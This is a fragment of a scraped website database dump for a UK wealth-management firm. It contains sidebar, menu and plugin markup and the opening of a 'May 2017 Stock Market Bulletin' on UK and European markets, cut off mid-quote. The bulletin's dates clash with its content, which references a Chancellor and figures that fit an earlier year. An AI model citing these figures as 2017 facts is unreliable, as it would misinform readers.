class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n									<div class=\"meta\">&#13;\n										June 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../5-facts-know-annuities/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n									<div class=\"meta\">&#13;\n										June 9th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n									<div class=\"meta\">&#13;\n										June 6th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div style=\"clear:both;\"/></article></section></div>				&#13;\n&#13;\n				<article class=\"col last\"/></footer></div>&#13;\n	&#13;\n			<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\njQuery(window).load(function() {\r\n\r\njQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\"\r\n, animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true});\r\n\r\n});\r\n]]></script><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;\n	Stock Market Bulletin - March 2014','In these bulletins we’ll look at political and economic news from around the world, and report on the movement of the major stock markets.','publish','closed','closed','','stock-market-bulletin-march-2014','','','2017-09-21 16:34:34','2017-09-21 16:34:34','',0,'http://www.equalitywalk.org.uk/stock-market-bulletin-march-2014',0,'page','',0),(81,1,'2017-09-21 16:34:34','2017-09-21 16:34:34','<body class=\"single single-post postid-8330 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v4\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"header-info\">The 2017 Budget Announcement Will Improve Pension Planning for Everyone. Make Sure You Know How? <b><a href=\"../pensions/pension-review/\">Learn More&gt;&gt;</a></b><a href=\"mailto:\"/></div>&#13;\n			</div>&#13;\n			<div class=\"alignright\">&#13;\n							</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:0px;margin-left:0px;margin-bottom:0px;\">&#13;\n				<a href=\"/\">&#13;\n					<img src=\"../wp-content/uploads/2013/06/RSR-Logo.png\" alt=\"Equity SMART\" class=\"normal_logo\"/></a>&#13;\n			</div>&#13;\n									<h3 class=\"tagline\">Call Us Now<br/><big><big><b/></big></big>&#13;\n								</h3></div>&#13;\n	</header><div id=\"small-nav\">&#13;\n		<div class=\"avada-row\">&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7671\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-7671\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-2 col-span-2 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Stakeholder Pensions</a></li>&#13;\n		<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Occupational Pensions</a></li>&#13;\n		<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-2 col-lg-6 col-md-6 col-sm-6\"><h3 class=\"fusion-megamenu-title\">More Information&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-dropdown-menu\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121 fusion-dropdown-submenu\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118 fusion-dropdown-submenu\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102 fusion-dropdown-submenu\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124 fusion-dropdown-submenu\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-dropdown-menu\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108 fusion-dropdown-submenu\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										May 2017 Stock Market Bulletin										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>May 2017 Stock Market Bulletin</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-8330\" class=\"post-8330 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">May 2017 Stock Market Bulletin</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p><b/></p>&#13;\n<h1><b>The Equity SMART</b></h1>&#13;\n<h1 style=\"text-align: left;\">Stock Market Bulletin</h1>&#13;\n<h3 style=\"text-align: left;\">May 3rd 2017 – Reading time 10 minutes&#13;\n</h3><p> </p>&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div><div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p>The month got off to a gloomy start – especially if you are a Guardian reader. Five signs the global recovery may be an illusion was the headline on one of its main analysis articles, which pointed out that the world of 2017 was not very dissimilar to the world of 2004 – when (we now realise) it was all starting to go wrong.</p>&#13;\n<p>Citing problems in world bond markets, the difficulties of unwinding the stimulus packages various central banks have used and possible future conflicts over dwindling natural resources, the article painted a bleak picture. Add in the continuing – and seemingly intractable – problems in the Ukraine and it would have been easy to start April with your glass very definitely half empty.</p>&#13;\n<p>On the other hand the glass was half full and getting fuller for a lot of people. Business confidence in the UK was surging; industrial output figures suggested the Eurozone was recovering; the Dow Jones index in the US ended the month at a record level and even the Spanish economy grew at its fastest rate since 2008.</p>&#13;\n<p>As usual the truth was somewhere in the middle. There was good news and bad news around the world in April, with none of the major stock markets making any really significant moves. Of the ones we report on in this bulletin, the UK was the best performer, whilst the Russian market turned in another poor performance.</p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">UK</span></h1>&#13;\n<p/>&#13;\n<p>There is no doubt that business confidence is recovering in the UK. There’s plenty of anecdotal evidence, but the figures to back that up came from the British Chambers of Commerce survey of 8,000 firms. This showed service exports at an all-time high and many key manufacturing measures also at record levels.</p>&#13;\n<p>The survey did point out that the recovery was still too reliant on consumer spending and also mentioned – as we’ve highlighted more than once in this bulletin – that lack of finance for business still gives grounds for concern.</p>&#13;\n<p>There was contrasting news in the housing market, with one report from Ernst &amp; Young suggesting average rises of 7% for this year and next year. However figures released from the Land Registry at the end of the month showed a fall of 0.4% in prices in March, valuing the average UK house at £169,124. The Land Registry were forecasting a rise in prices closer to 5% for the coming 12 months.</p>&#13;\n<p>Good news for the Government – and George Osborne in particular – came when it was confirmed that the UK deficit had fallen to its lowest level since the start of the financial crisis, with the economic recovery boosting tax receipts. Government borrowing fell to £107.7bn in the fiscal year ending in March: this was down from £115.1bn in the previous year and just met the Chancellor’s target of £107.8bn.</p>&#13;\n<p>This meant that borrowing as a percentage of GDP fell to 6.6% – the lowest since 2007/2008 according to the Office for National Statistics.</p>&#13;\n<p>This was all good news as far as the FT-SE100 index was concerned, which rose 3% in April to finish the month at 6,780.</p>&#13;\n<h1 style=\"text-align: center;\"><span style=\"color: #0000ff;\">Europe</span></h1>&#13;\n<p><a href=\"#\"/></p>&#13;\n<p>Let’s start with the good news. We have commented plenty of times on the problems in Spain, so it seems only fair that we should report the good news as well.</p>&#13;\n<p>According to the country’s National Statistics Institute the Spanish economy grew at its fastest quarterly pace since 2008, with GDP increasing by 0.4% in the first three months of the year. However, unemployment remains worryingly high – the long term unemployment rate is over 13% and the figures for youth unemployment are considerably worse. Spanish retail sales also fell by 0.5% in March, so the country’s problems are a long way from over.</p>&#13;\n<p>There was also good news for the Eurozone as a whole, with hopes of a recovery boosted by a surge in industrial output. The ‘surge’ was only 0.2% (which isn’t even a blip if you’re Chinese) but the economists translated this into GDP growth of 1.5-2% for the full year, with some commentators suggesting that the relatively mild winter would see GDP growth at the top end of the range.</p>&#13;\n<p>Christian Schulz, senior economist at Barenberg commented, “The Eurozone 